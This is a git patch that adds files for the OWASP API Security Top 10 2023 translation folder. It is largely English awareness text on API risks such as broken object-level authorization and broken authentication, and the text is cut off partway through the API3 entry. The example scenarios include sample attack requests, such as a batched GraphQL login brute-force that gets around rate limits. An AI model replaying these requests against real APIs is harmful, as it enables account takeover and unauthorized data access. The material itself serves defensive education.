From a13881a6d491d9fc6fca3880af0a76a44fbc36dd Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 16 Dec 2023 22:33:55 +0000 Subject: [PATCH 01/64] Adding pt-pt folder to 2023 edition --- editions/2023/mkdocs.yml | 3 + editions/2023/pt-pt/0x00-header.md | 14 ++ editions/2023/pt-pt/0x00-notice.md | 14 ++ editions/2023/pt-pt/0x00-toc.md | 23 +++ editions/2023/pt-pt/0x01-about-owasp.md | 59 ++++++ editions/2023/pt-pt/0x02-foreword.md | 43 +++++ editions/2023/pt-pt/0x03-introduction.md | 61 ++++++ editions/2023/pt-pt/0x04-release-notes.md | 47 +++++ .../2023/pt-pt/0x10-api-security-risks.md | 47 +++++ editions/2023/pt-pt/0x11-t10.md | 28 +++ .../0xa1-broken-object-level-authorization.md | 108 +++++++++++ .../2023/pt-pt/0xa2-broken-authentication.md | 134 ++++++++++++++ ...ken-object-property-level-authorization.md | 151 +++++++++++++++ .../0xa4-unrestricted-resource-consumption.md | 173 ++++++++++++++++++ ...xa5-broken-function-level-authorization.md | 100 ++++++++++ ...cted-access-to-sensitive-business-flows.md | 107 +++++++++++ .../pt-pt/0xa7-server-side-request-forgery.md | 161 ++++++++++++++++ .../pt-pt/0xa8-security-misconfiguration.md | 130 +++++++++++++ .../0xa9-improper-inventory-management.md | 105 +++++++++++ .../pt-pt/0xaa-unsafe-consumption-of-apis.md | 108 +++++++++++ editions/2023/pt-pt/0xb0-next-devs.md | 38 ++++ editions/2023/pt-pt/0xb1-next-devsecops.md | 29 +++ editions/2023/pt-pt/0xd0-about-data.md | 73 ++++++++ editions/2023/pt-pt/0xd1-acknowledgments.md | 13 ++ editions/2023/pt-pt/images/cover.jpg | Bin 0 -> 123390 bytes editions/2023/pt-pt/images/front-cc.png | Bin 0 -> 5584 bytes editions/2023/pt-pt/images/front-wasp.png | Bin 0 -> 302829 bytes editions/2023/pt-pt/images/license.png | Bin 0 -> 14003 bytes editions/2023/pt-pt/images/owasp-logo.png | Bin 0 -> 11091 bytes 29 files changed, 1769 insertions(+) create mode 100644 editions/2023/pt-pt/0x00-header.md create mode 100644 editions/2023/pt-pt/0x00-notice.md create mode 100644 editions/2023/pt-pt/0x00-toc.md create mode 100644 editions/2023/pt-pt/0x01-about-owasp.md create mode 100644 editions/2023/pt-pt/0x02-foreword.md create mode 100644 editions/2023/pt-pt/0x03-introduction.md create mode 100644 editions/2023/pt-pt/0x04-release-notes.md create mode 100644 editions/2023/pt-pt/0x10-api-security-risks.md create mode 100644 editions/2023/pt-pt/0x11-t10.md create mode 100644 editions/2023/pt-pt/0xa1-broken-object-level-authorization.md create mode 100644 editions/2023/pt-pt/0xa2-broken-authentication.md create mode 100644 editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md create mode 100644 editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md create mode 100644 editions/2023/pt-pt/0xa5-broken-function-level-authorization.md create mode 100644 editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md create mode 100644 editions/2023/pt-pt/0xa7-server-side-request-forgery.md create mode 100644 editions/2023/pt-pt/0xa8-security-misconfiguration.md create mode 100644 editions/2023/pt-pt/0xa9-improper-inventory-management.md create mode 100644 editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md create mode 100644 editions/2023/pt-pt/0xb0-next-devs.md create mode 100644 editions/2023/pt-pt/0xb1-next-devsecops.md create mode 100644 editions/2023/pt-pt/0xd0-about-data.md create mode 100644 editions/2023/pt-pt/0xd1-acknowledgments.md create mode 100644 editions/2023/pt-pt/images/cover.jpg create mode 100644 editions/2023/pt-pt/images/front-cc.png create mode 100644 editions/2023/pt-pt/images/front-wasp.png create mode 100644 editions/2023/pt-pt/images/license.png create mode 100644 editions/2023/pt-pt/images/owasp-logo.png diff --git a/editions/2023/mkdocs.yml b/editions/2023/mkdocs.yml index 98a46f03a..4f9537dc8 100644 --- a/editions/2023/mkdocs.yml +++ b/editions/2023/mkdocs.yml @@ -5,3 +5,6 @@ extra: alternate: - name: English lang: en + alternate: + - name: Portugês (Portugal) + lang: pt-pt diff --git a/editions/2023/pt-pt/0x00-header.md b/editions/2023/pt-pt/0x00-header.md new file mode 100644 index 000000000..d3936a8b2 --- /dev/null +++ b/editions/2023/pt-pt/0x00-header.md @@ -0,0 +1,14 @@ +--- +title: '' +description: OWASP API Security Top 10 2023 edition +--- + +![OWASP LOGO](images/cover.jpg) + +| | | | +| - | - | - | +| https://owasp.org | This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License][1] | ![Creative Commons License Logo](images/front-cc.png) | + +[1]: http://creativecommons.org/licenses/by-sa/4.0/ + + diff --git a/editions/2023/pt-pt/0x00-notice.md b/editions/2023/pt-pt/0x00-notice.md new file mode 100644 index 000000000..c40368695 --- /dev/null +++ b/editions/2023/pt-pt/0x00-notice.md @@ -0,0 +1,14 @@ +# Notice + +This is the text version of OWASP API Security Top 10, used as source for any +official versions of this document such the web site. + +Contributions to the project such as comments, corrections, or translations +should be done here. For details on [How To Contribute][1], please refer to +[CONTRIBUTING.md][1]. + +* Erez Yallon +* Inon Shkedy +* Paulo Silva + +[1]: ../../../CONTRIBUTING.md diff --git a/editions/2023/pt-pt/0x00-toc.md b/editions/2023/pt-pt/0x00-toc.md new file mode 100644 index 000000000..ca93bd5ba --- /dev/null +++ b/editions/2023/pt-pt/0x00-toc.md @@ -0,0 +1,23 @@ +# Table of Contents + +* [Table of Contents](0x00-toc.md) +* [About OWASP](0x01-about-owasp.md) +* [Foreword](0x02-foreword.md) +* [Introduction](0x03-introduction.md) +* [Release Notes](0x04-release-notes.md) +* [API Security Risks](0x10-api-security-risks.md) +* [OWASP Top 10 API Security Risks – 2023](0x11-t10.md) +* [API1:2023 Broken Object Level Authorization](0xa1-broken-object-level-authorization.md) +* [API2:2023 Broken Authentication](0xa2-broken-authentication.md) +* [API3:2023 Broken Object Property Level Authorization](0xa3-broken-object-property-level-authorization.md) +* [API4:2023 Unrestricted Resource Consumption](0xa4-unrestricted-resource-consumption.md) +* [API5:2023 Broken Function Level Authorization](0xa5-broken-function-level-authorization.md) +* [API6:2023 Unrestricted Access to Sensitive Business Flows](0xa6-unrestricted-access-to-sensitive-business-flows.md) +* [API7:2023 Server Side Request Forgery](0xa7-server-side-request-forgery.md) +* [API8:2023 Security Misconfiguration](0xa8-security-misconfiguration.md) +* [API9:2023 Improper Inventory Management](0xa9-improper-inventory-management.md) +* [API10:2023 Unsafe Consumption of APIs](0xaa-unsafe-consumption-of-apis.md) +* [What's Next For Developers](0xb0-next-devs.md) +* [What's Next For DevSecOps](0xb1-next-devsecops.md) +* [Methodology and Data](0xd0-about-data.md) +* [Acknowledgments](0xd1-acknowledgments.md) diff --git a/editions/2023/pt-pt/0x01-about-owasp.md b/editions/2023/pt-pt/0x01-about-owasp.md new file mode 100644 index 000000000..1a7e05126 --- /dev/null +++ b/editions/2023/pt-pt/0x01-about-owasp.md @@ -0,0 +1,59 @@ +# About OWASP + +The Open Worldwide Application Security Project (OWASP) is an open community +dedicated to enabling organizations to develop, purchase, and maintain +applications and APIs that can be trusted. + +At OWASP, you'll find free and open: + +* Application security tools and standards. +* Complete books on application security testing, secure code development, and + secure code review. +* Presentations and [videos][1]. +* [Cheat sheets][2] on many common topics. +* Standard security controls and libraries. +* [Local chapters worldwide][3]. +* Cutting edge research. +* Extensive [conferences worldwide][4]. +* [Mailing lists][5] ([archive][6]). + +Learn more at: [https://www.owasp.org][7]. + +All OWASP tools, documents, videos, presentations, and chapters are free and +open to anyone interested in improving application security. + +We advocate approaching application security as a people, process, and +technology problem, because the most effective approaches to application +security require improvements in these areas. + +OWASP is a new kind of organization. Our freedom from commercial pressures +allows us to provide unbiased, practical, and cost-effective information about +application security. + +OWASP is not affiliated with any technology company, although we support the +informed use of commercial security technology. OWASP produces many types of +materials in a collaborative, transparent, and open way. + +The OWASP Foundation is the non-profit entity that ensures the project's +long-term success. Almost everyone associated with OWASP is a volunteer, +including the OWASP board, chapter leaders, project leaders, and project +members. We support innovative security research with grants and infrastructure. + +Come join us! + +## Copyright and License + +![license](images/license.png) + +Copyright © 2003-2023 The OWASP Foundation. This document is released under the +[Creative Commons Attribution Share-Alike 4.0 license][8]. For any reuse or +distribution, you must make it clear to others the license terms of this work. + +[1]: https://www.youtube.com/user/OWASPGLOBAL +[2]: https://cheatsheetseries.owasp.org/ +[3]: https://owasp.org/chapters/ +[4]: https://owasp.org/events/ +[5]: https://groups.google.com/a/owasp.org/forum/#!overview +[6]: https://lists.owasp.org/mailman/listinfo +[7]: https://www.owasp.org +[8]: http://creativecommons.org/licenses/by-sa/4.0/ diff --git a/editions/2023/pt-pt/0x02-foreword.md b/editions/2023/pt-pt/0x02-foreword.md new file mode 100644 index 000000000..944acfc82 --- /dev/null +++ b/editions/2023/pt-pt/0x02-foreword.md @@ -0,0 +1,43 @@ +# Foreword + +A foundational element of innovation in today's app-driven world is the +Application Programming Interface (API). From banks, retail, and transportation +to IoT, autonomous vehicles, and smart cities, APIs are a critical part of +modern mobile, SaaS, and web applications and can be found in customer-facing, +partner-facing, and internal applications. + +By nature, APIs expose application logic and sensitive data such as Personally +Identifiable Information (PII) and because of this, APIs have increasingly +become a target for attackers. Without secure APIs, rapid innovation would be +impossible. + +Although a broader web application security risks Top 10 still makes sense, due +to their particular nature, an API-specific security risks list is required. +API security focuses on strategies and solutions to understand and mitigate the +unique vulnerabilities and security risks associated with APIs. + +If you're familiar with the [OWASP Top 10 Project][1], then you'll notice the +similarities between both documents: they are intended for readability and +adoption. If you're new to the OWASP Top 10 series, you may be better off +reading the [API Security Risks][2] and [Methodology and Data][3] sections +before jumping into the Top 10 list. + +You can contribute to OWASP API Security Top 10 with your questions, comments, +and ideas at our GitHub project repository: + +* https://owasp.org/www-project-api-security/ +* https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md + +You can find the OWASP API Security Top 10 here: + +* https://owasp.org/www-project-api-security/ +* https://github.com/OWASP/API-Security + +We wish to thank all the contributors who made this project possible with their +effort and contributions. They are all listed in the [Acknowledgments +section][4]. Thank you! + +[1]: https://owasp.org/www-project-top-ten/ +[2]: ./0x10-api-security-risks.md +[3]: ./0xd0-about-data.md +[4]: ./0xd1-acknowledgments.md diff --git a/editions/2023/pt-pt/0x03-introduction.md b/editions/2023/pt-pt/0x03-introduction.md new file mode 100644 index 000000000..752492b1f --- /dev/null +++ b/editions/2023/pt-pt/0x03-introduction.md @@ -0,0 +1,61 @@ +# Introduction + +## Welcome to the OWASP API Security Top 10 - 2023! + +Welcome to the second edition of the OWASP API Security Top 10! + +This awareness document was first published back in 2019. Since then, the API +Security industry has flourished and become more mature. We strongly believe +this work has positively contributed to it, due to it being quickly adopted as +an industry reference. + +APIs play a very important role in modern application architecture. But since +innovation has a different pace than creating security awareness, we believe +it's important to focus on creating awareness for common API security +weaknesses. + +The primary goal of the OWASP API Security Top 10 is to educate those involved +in API development and maintenance, for example, developers, designers, +architects, managers, or organizations. You can know more about the API Security +Project visiting [the project page][1]. + +If you're not familiar with the OWASP top 10 series, we recommend checking at +least the following top 10 projects: + +* [OWASP Cloud-Native Application Security Top 10][2] +* [OWASP Desktop App Security Top 10][3] +* [OWASP Docker Top 10][4] +* [OWASP Low-Code/No-Code Top 10][5] +* [OWASP Machine Learning Security Top Ten][6] +* [OWASP Mobile Top 10][7] +* [OWASP TOP 10][8] +* [OWASP Top 10 CI/CD Security Risks][9] +* [OWASP Top 10 Client-Side Security Risks][10] +* [OWASP Top 10 Privacy Risks][11] +* [OWASP Serverless Top 10][12] + +None of the projects replaces another: if you're working on a mobile application +powered by a back-end API, you're better off reading both the corresponding top +10's. The same is valid if you're working on a web or desktop application +powered by APIs. + +In the [Methodology and Data][13] section, you can read more about how this +edition was created. For now, we encourage everyone to contribute with +questions, comments, and ideas at our [GitHub repository][14] or +[Mailing list][15]. + +[1]: https://owasp.org/www-project-api-security/ +[2]: https://owasp.org/www-project-cloud-native-application-security-top-10/ +[3]: https://owasp.org/www-project-desktop-app-security-top-10/ +[4]: https://owasp.org/www-project-docker-top-10/ +[5]: https://owasp.org/www-project-top-10-low-code-no-code-security-risks/ +[6]: https://owasp.org/www-project-machine-learning-security-top-10/ +[7]: https://owasp.org/www-project-mobile-top-10/ +[8]: https://owasp.org/www-project-top-ten/ +[9]: https://owasp.org/www-project-top-10-ci-cd-security-risks/ +[10]: https://owasp.org/www-project-top-10-client-side-security-risks/ +[11]: https://owasp.org/www-project-top-10-privacy-risks/ +[12]: https://owasp.org/www-project-serverless-top-10/ +[13]: ./0xd0-about-data.md +[14]: https://github.com/OWASP/API-Security +[15]: https://groups.google.com/a/owasp.org/forum/#!forum/api-security-project diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md new file mode 100644 index 000000000..bff6dc01c --- /dev/null +++ b/editions/2023/pt-pt/0x04-release-notes.md @@ -0,0 +1,47 @@ +# Release Notes + +This is the second edition of the OWASP API Security Top 10 edition, exactly +four years after its first release. A lot has changed in the API (security) +scene. API traffic increased at a fast pace, some API protocols gained a lot +more traction, many new API security vendors/solutions have popped up, and, of +course, attackers have developed new skills and techniques to compromise +APIs. It was about time to get the list of the ten most critical API security +risks updated. + +With a more mature API security industry, for the first time, there was [a +public call for data][1]. Unfortunately, no data was contributed, but based on +the project's team experience, careful API security specialist review, and +community feedback on the release candidate, we built this new list. In the +[Methodology and Data section][2], you'll find more details about how this +version was built. For more details about the security risks please refer to the +[API Security Risks section][3]. + +The OWASP API Security Top 10 2023 is a forward-looking awareness document for +a fast pace industry. It does not replace other TOP 10's. In this edition: + +* We've combined Excessive Data Exposure and Mass Assignment focusing on the + common root cause: object property level authorization validation failures. +* We've put more emphasis on resource consumption, over focusing on the pace + they are exhausted. +* We've created a new category "Unrestricted Access to Sensitive Business Flows" + to address new threats, including most of those that can be mitigated using + rate limiting. +* We added "Unsafe Consumption of APIs" to address something we've started + seeing: attackers have started looking for a target's integrated services to + compromise those, instead of hitting the APIs of their target directly. This + is the right time to start creating awareness about this increasing risk. + +APIs play an increasingly important role in modern microservices architecture, +Single Page Applications (SPAs), mobile apps, IoT, etc. The OWASP API Security +Top 10 is a required effort to create awareness about modern API security +issues. + +This update was only possible due to the great effort of several volunteers, +listed in the [Acknowledgments][4] section. + +Thank you! + +[1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/ +[2]: ./0xd0-about-data.md +[3]: ./0x10-api-security-risks.md +[4]: ./0xd1-acknowledgments.md diff --git a/editions/2023/pt-pt/0x10-api-security-risks.md b/editions/2023/pt-pt/0x10-api-security-risks.md new file mode 100644 index 000000000..c9d284b14 --- /dev/null +++ b/editions/2023/pt-pt/0x10-api-security-risks.md @@ -0,0 +1,47 @@ +# API Security Risks + +The [OWASP Risk Rating Methodology][1] was used to do the risk analysis. + +The table below summarizes the terminology associated with the risk score. + +| Threat Agents | Exploitability | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impacts | +| :-: | :-: | :-: | :-: | :-: | :-: | +| API Specific | Easy: **3** | Widespread **3** | Easy **3** | Severe **3** | Business Specific | +| API Specific | Average: **2** | Common **2** | Average **2** | Moderate **2** | Business Specific | +| API Specific | Difficult: **1** | Difficult **1** | Difficult **1** | Minor **1** | Business Specific | + +**Note**: This approach does not take the likelihood of the threat agent into +account. Nor does it account for any of the various technical details associated +with your particular application. Any of these factors could significantly +affect the overall likelihood of an attacker finding and exploiting a particular +vulnerability. This rating does not take into account the actual impact on your +business. Your organization will have to decide how much security risk from +applications and APIs the organization is willing to accept given your culture, +industry, and regulatory environment. The purpose of the OWASP API Security Top +10 is not to do this risk analysis for you. Since this edition is not +data-driven, prevalence results from a consensus among the team members. + +## References + +### OWASP + +* [OWASP Risk Rating Methodology][1] +* [Article on Threat/Risk Modeling][2] + +### External + +* [ISO 31000: Risk Management Std][3] +* [ISO 27001: ISMS][4] +* [NIST Cyber Framework (US)][5] +* [ASD Strategic Mitigations (AU)][6] +* [NIST CVSS 3.0][7] +* [Microsoft Threat Modeling Tool][8] + +[1]: https://owasp.org/www-project-risk-assessment-framework/ +[2]: https://owasp.org/www-community/Threat_Modeling +[3]: https://www.iso.org/iso-31000-risk-management.html +[4]: https://www.iso.org/isoiec-27001-information-security.html +[5]: https://www.nist.gov/cyberframework +[6]: https://www.asd.gov.au/infosec/mitigationstrategies.htm +[7]: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator +[8]: https://www.microsoft.com/en-us/download/details.aspx?id=49168 diff --git a/editions/2023/pt-pt/0x11-t10.md b/editions/2023/pt-pt/0x11-t10.md new file mode 100644 index 000000000..230cc8c72 --- /dev/null +++ b/editions/2023/pt-pt/0x11-t10.md @@ -0,0 +1,28 @@ +# OWASP Top 10 API Security Risks – 2023 + +| Risk | Description | +| ---- | ----------- | +| [API1:2023 - Broken Object Level Authorization][api1] | APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user. | +| [API2:2023 - Broken Authentication][api2] | Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising a system's ability to identify the client/user, compromises API security overall. | +| [API3:2023 - Broken Object Property Level Authorization][api3] | This category combines [API3:2019 Excessive Data Exposure][1] and [API6:2019 - Mass Assignment][2], focusing on the root cause: the lack of or improper authorization validation at the object property level. This leads to information exposure or manipulation by unauthorized parties. | +| [API4:2023 - Unrestricted Resource Consumption][api4] | Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Other resources such as emails/SMS/phone calls or biometrics validation are made available by service providers via API integrations, and paid for per request. Successful attacks can lead to Denial of Service or an increase of operational costs. | +| [API5:2023 - Broken Function Level Authorization][api5] | Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers can gain access to other users’ resources and/or administrative functions. | +| [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | APIs vulnerable to this risk expose a business flow - such as buying a ticket, or posting a comment - without compensating for how the functionality could harm the business if used excessively in an automated manner. This doesn't necessarily come from implementation bugs. | +| [API7:2023 - Server Side Request Forgery][api7] | Server-Side Request Forgery (SSRF) flaws can occur when an API is fetching a remote resource without validating the user-supplied URI. This enables an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall or a VPN. | +| [API8:2023 - Security Misconfiguration][api8] | APIs and the systems supporting them typically contain complex configurations, meant to make the APIs more customizable. Software and DevOps engineers can miss these configurations, or don't follow security best practices when it comes to configuration, opening the door for different types of attacks. | +| [API9:2023 - Improper Inventory Management][api9] | APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints. | +| [API10:2023 - Unsafe Consumption of APIs][api10] | Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards. In order to compromise APIs, attackers go after integrated third-party services instead of trying to compromise the target API directly. | + +[1]: https://owasp.org/API-Security/editions/2019/en/0xa3-excessive-data-exposure/ +[2]: https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/ +[3]: https://owasp.org/API-Security/editions/2019/en/0xa4-lack-of-resources-and-rate-limiting/ +[api1]: 0xa1-broken-object-level-authorization.md +[api2]: 0xa2-broken-authentication.md +[api3]: 0xa3-broken-object-property-level-authorization.md +[api4]: 0xa4-unrestricted-resource-consumption.md +[api5]: 0xa5-broken-function-level-authorization.md +[api6]: 0xa6-unrestricted-access-to-sensitive-business-flows.md +[api7]: 0xa7-server-side-request-forgery.md +[api8]: 0xa8-security-misconfiguration.md +[api9]: 0xa9-improper-inventory-management.md +[api10]: 0xaa-unsafe-consumption-of-apis.md diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md new file mode 100644 index 000000000..be629d9c8 --- /dev/null +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -0,0 +1,108 @@ +# API1:2023 Broken Object Level Authorization + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Moderate** : Business Specific | +| Attackers can exploit API endpoints that are vulnerable to broken object-level authorization by manipulating the ID of an object that is sent within the request. Object IDs can be anything from sequential integers, UUIDs, or generic strings. Regardless of the data type, they are easy to identify in the request target (path or query string parameters), request headers, or even as part of the request payload. | This issue is extremely common in API-based applications because the server component usually does not fully track the client’s state, and instead, relies more on parameters like object IDs, that are sent from the client to decide which objects to access. The server response is usually enough to understand whether the request was successful. | Unauthorized access to other users’ objects can result in data disclosure to unauthorized parties, data loss, or data manipulation. Under certain circumstances, unauthorized access to objects can also lead to full account takeover. | + +## Is the API Vulnerable? + +Object level authorization is an access control mechanism that is usually +implemented at the code level to validate that a user can only access the +objects that they should have permissions to access. + +Every API endpoint that receives an ID of an object, and performs any action +on the object, should implement object-level authorization checks. The checks +should validate that the logged-in user has permissions to perform the +requested action on the requested object. + +Failures in this mechanism typically lead to unauthorized information +disclosure, modification, or destruction of all data. + +Comparing the user ID of the current session (e.g. by extracting it from the +JWT token) with the vulnerable ID parameter isn't a sufficient solution to +solve Broken Object Level Authorization (BOLA). This approach could address +only a small subset of cases. + +In the case of BOLA, it's by design that the user will have access to the +vulnerable API endpoint/function. The violation happens at the object level, +by manipulating the ID. If an attacker manages to access an API +endpoint/function they should not have access to - this is a case of [Broken +Function Level Authorization][5] (BFLA) rather than BOLA. + +## Example Attack Scenarios + +### Scenario #1 + +An e-commerce platform for online stores (shops) provides a listing page with +the revenue charts for their hosted shops. Inspecting the browser requests, an +attacker can identify the API endpoints used as a data source for those charts +and their pattern: `/shops/{shopName}/revenue_data.json`. Using another API +endpoint, the attacker can get the list of all hosted shop names. With a +simple script to manipulate the names in the list, replacing `{shopName}` in +the URL, the attacker gains access to the sales data of thousands of e-commerce +stores. + +### Scenario #2 + +An automobile manufacturer has enabled remote control of its vehicles via a +mobile API for communication with the driver's mobile phone. The API enables +the driver to remotely start and stop the engine and lock and unlock the doors. +As part of this flow, the user sends the Vehicle Identification Number (VIN) to +the API. +The API fails to validate that the VIN represents a vehicle that belongs to the +logged in user, which leads to a BOLA vulnerability. An attacker can access +vehicles that don't belong to him. + +### Scenario #3 + +An online document storage service allows users to view, edit, store and delete +their documents. When a user's document is deleted, a GraphQL mutation with the +document ID is sent to the API. + +``` +POST /graphql +{ + "operationName":"deleteReports", + "variables":{ + "reportKeys":[""] + }, + "query":"mutation deleteReports($siteId: ID!, $reportKeys: [String]!) { + { + deleteReports(reportKeys: $reportKeys) + } + }" +} +``` + +Since the document with the given ID is deleted without any further permission +checks, a user may be able to delete another user's document. + +## How To Prevent + +* Implement a proper authorization mechanism that relies on the user policies + and hierarchy. +* Use the authorization mechanism to check if the logged-in user has access to + perform the requested action on the record in every function that uses an + input from the client to access a record in the database. +* Prefer the use of random and unpredictable values as GUIDs for records' IDs. +* Write tests to evaluate the vulnerability of the authorization mechanism. Do + not deploy changes that make the tests fail. + +## References + +### OWASP + +* [Authorization Cheat Sheet][1] +* [Authorization Testing Automation Cheat Sheet][2] + +### External + +* [CWE-285: Improper Authorization][3] +* [CWE-639: Authorization Bypass Through User-Controlled Key][4] + +[1]: https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html +[2]: https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html +[3]: https://cwe.mitre.org/data/definitions/285.html +[4]: https://cwe.mitre.org/data/definitions/639.html +[5]: ./0xa5-broken-function-level-authorization.md diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md new file mode 100644 index 000000000..a02822f90 --- /dev/null +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -0,0 +1,134 @@ +# API2:2023 Broken Authentication + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific | +| The authentication mechanism is an easy target for attackers since it's exposed to everyone. Although more advanced technical skills may be required to exploit some authentication issues, exploitation tools are generally available. | Software and security engineers’ misconceptions regarding authentication boundaries and inherent implementation complexity make authentication issues prevalent. Methodologies of detecting broken authentication are available and easy to create. | Attackers can gain complete control of other users’ accounts in the system, read their personal data, and perform sensitive actions on their behalf. Systems are unlikely to be able to distinguish attackers’ actions from legitimate user ones. | + +## Is the API Vulnerable? + +Authentication endpoints and flows are assets that need to be protected. +Additionally, "Forgot password / reset password" should be treated the same way +as authentication mechanisms. + +An API is vulnerable if it: + +* Permits credential stuffing where the attacker uses brute force with a list + of valid usernames and passwords. +* Permits attackers to perform a brute force attack on the same user account, + without presenting captcha/account lockout mechanism. +* Permits weak passwords. +* Sends sensitive authentication details, such as auth tokens and passwords in + the URL. +* Allows users to change their email address, current password, or do any other + sensitive operations without asking for password confirmation. +* Doesn't validate the authenticity of tokens. +* Accepts unsigned/weakly signed JWT tokens (`{"alg":"none"}`) +* Doesn't validate the JWT expiration date. +* Uses plain text, non-encrypted, or weakly hashed passwords. +* Uses weak encryption keys. + +On top of that, a microservice is vulnerable if: + +* Other microservices can access it without authentication +* Uses weak or predictable tokens to enforce authentication + +## Example Attack Scenarios + +## Scenario #1 + +In order to perform user authentication the client has to issue an API request +like the one below with the user credentials: + +``` +POST /graphql +{ + "query":"mutation { + login (username:\"\",password:\"\") { + token + } + }" +} +``` + +If credentials are valid, then an auth token is returned which should be +provided in subsequent requests to identify the user. Login attempts are +subject to restrictive rate limiting: only three requests are allowed per +minute. + +To brute force log in with a victim's account, bad actors leverage GraphQL +query batching to bypass the request rate limiting, speeding up the attack: + +``` +POST /graphql +[ + {"query":"mutation{login(username:\"victim\",password:\"password\"){token}}"}, + {"query":"mutation{login(username:\"victim\",password:\"123456\"){token}}"}, + {"query":"mutation{login(username:\"victim\",password:\"qwerty\"){token}}"}, + ... + {"query":"mutation{login(username:\"victim\",password:\"123\"){token}}"}, +] +``` + +## Scenario #2 + +In order to update the email address associated with a user's account, clients +should issue an API request like the one below: + +``` +PUT /account +Authorization: Bearer + +{ "email": "" } +``` + +Because the API does not require users to confirm their identity by providing +their current password, bad actors able to put themselves in a position to +steal the auth token might be able to take over the victim's account by starting +the reset password workflow after updating the email address of the victim's +account. + +## How To Prevent + +* Make sure you know all the possible flows to authenticate to the API + (mobile/ web/deep links that implement one-click authentication/etc.). Ask + your engineers what flows you missed. +* Read about your authentication mechanisms. Make sure you understand what and + how they are used. OAuth is not authentication, and neither are API keys. +* Don't reinvent the wheel in authentication, token generation, or password + storage. Use the standards. +* Credential recovery/forgot password endpoints should be treated as login + endpoints in terms of brute force, rate limiting, and lockout protections. +* Require re-authentication for sensitive operations (e.g. changing the account + owner email address/2FA phone number). +* Use the [OWASP Authentication Cheatsheet][1]. +* Where possible, implement multi-factor authentication. +* Implement anti-brute force mechanisms to mitigate credential stuffing, + dictionary attacks, and brute force attacks on your authentication endpoints. + This mechanism should be stricter than the regular rate limiting mechanisms + on your APIs. +* Implement [account lockout][2]/captcha mechanisms to prevent brute force + attacks against specific users. Implement weak-password checks. +* API keys should not be used for user authentication. They should only be used + for [API clients][3] authentication. + +## References + +### OWASP + +* [Authentication Cheat Sheet][1] +* [Key Management Cheat Sheet][4] +* [Credential Stuffing][5] + +### External + +* [CWE-204: Observable Response Discrepancy][6] +* [CWE-307: Improper Restriction of Excessive Authentication Attempts][7] + +[1]: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html +[2]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism(OTG-AUTHN-003) +[3]: https://cloud.google.com/endpoints/docs/openapi/when-why-api-key +[4]: https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html +[5]: https://owasp.org/www-community/attacks/Credential_stuffing +[6]: https://cwe.mitre.org/data/definitions/204.html +[7]: https://cwe.mitre.org/data/definitions/307.html diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md new file mode 100644 index 000000000..172e75d3b --- /dev/null +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -0,0 +1,151 @@ +# API3:2023 Broken Object Property Level Authorization + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific | +| APIs tend to expose endpoints that return all object’s properties. This is particularly valid for REST APIs. For other protocols such as GraphQL, it may require crafted requests to specify which properties should be returned. Identifying these additional properties that can be manipulated requires more effort, but there are a few automated tools available to assist in this task. | Inspecting API responses is enough to identify sensitive information in returned objects’ representations. Fuzzing is usually used to identify additional (hidden) properties. Whether they can be changed is a matter of crafting an API request and analyzing the response. Side-effect analysis may be required if the target property is not returned in the API response. | Unauthorized access to private/sensitive object properties may result in data disclosure, data loss, or data corruption. Under certain circumstances, unauthorized access to object properties can lead to privilege escalation or partial/full account takeover. | + +## Is the API Vulnerable? + +When allowing a user to access an object using an API endpoint, it is important +to validate that the user has access to the specific object properties they are +trying to access. + +An API endpoint is vulnerable if: + +* The API endpoint exposes properties of an object that are considered + sensitive and should not be read by the user. (previously named: "[Excessive + Data Exposure][1]") +* The API endpoint allows a user to change, add/or delete the value 